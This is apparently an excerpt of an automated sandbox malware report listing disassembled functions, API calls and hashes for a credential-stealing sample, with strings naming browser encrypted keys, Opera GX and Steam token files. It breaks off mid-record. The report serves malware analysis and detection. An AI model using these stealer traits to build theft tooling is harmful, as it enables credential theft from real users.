                                                                                                                            • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                            • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                            • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                            Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1065093856-0
                                                                                                                            • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                            • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                            • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                            • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                            Function 6CC23060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC23095
                                                                                                                              • Part of subcall function 6CC235A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCAF688,00001000), ref: 6CC235D5
                                                                                                                              • Part of subcall function 6CC235A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC235E0
                                                                                                                              • Part of subcall function 6CC235A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC235FD
                                                                                                                              • Part of subcall function 6CC235A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC2363F
                                                                                                                              • Part of subcall function 6CC235A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC2369F
                                                                                                                              • Part of subcall function 6CC235A0: __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC2309F
                                                                                                                              • Part of subcall function 6CC45B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC456EE,?,00000001), ref: 6CC45B85
                                                                                                                              • Part of subcall function 6CC45B50: EnterCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45B90
                                                                                                                              • Part of subcall function 6CC45B50: LeaveCriticalSection.KERNEL32(6CCAF688,?,?,?,6CC456EE,?,00000001), ref: 6CC45BD8
                                                                                                                              • Part of subcall function 6CC45B50: GetTickCount64.KERNEL32 ref: 6CC45BE4
                                                                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC230BE
                                                                                                                              • Part of subcall function 6CC230F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC23127
                                                                                                                              • Part of subcall function 6CC230F0: __aulldiv.LIBCMT ref: 6CC23140
                                                                                                                              • Part of subcall function 6CC5AB2A: __onexit.LIBCMT ref: 6CC5AB30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4291168024-0
                                                                                                                            • Opcode ID: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                            • Instruction ID: 5a9c8774d84f97b1cc1295034d764adcfd7641217aee7117d20f50894b58ed55
                                                                                                                            • Opcode Fuzzy Hash: 58887f45d4cc7a0a4fc86a24cd12d1cdc20f3e6c0855ebfa99c5666a1f1fb2b5
                                                                                                                            • Instruction Fuzzy Hash: 94F02D22E20B489BCB10DFB4A9451EEB774AF6B318F545319E89463531FF30A1E883D5
                                                                                                                            Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateComputerNameProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1664310425-0
                                                                                                                            • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                            • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                            • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                            • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                            Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                            • String ID: Opera GX
                                                                                                                            • API String ID: 1719890681-3280151751
                                                                                                                            • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                            • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                            • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                            • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                            Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-3916222277
                                                                                                                            • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                            • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                            • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                            • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                            Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                            • API String ID: 502913869-3507145866
                                                                                                                            • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                            • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                            • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                            • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                            Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID: 1iA
                                                                                                                            • API String ID: 3494564517-1863120733
                                                                                                                            • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                            • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                            • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                            • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                            Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                            • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                            • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                            • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                            Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.MSVCRT ref: 0041CBC9
                                                                                                                              • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                              • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                              • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                            • malloc.MSVCRT ref: 0041CC06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$lstrcpylstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974738957-0
                                                                                                                            • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                            • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                            • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                            • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                            Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                            • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
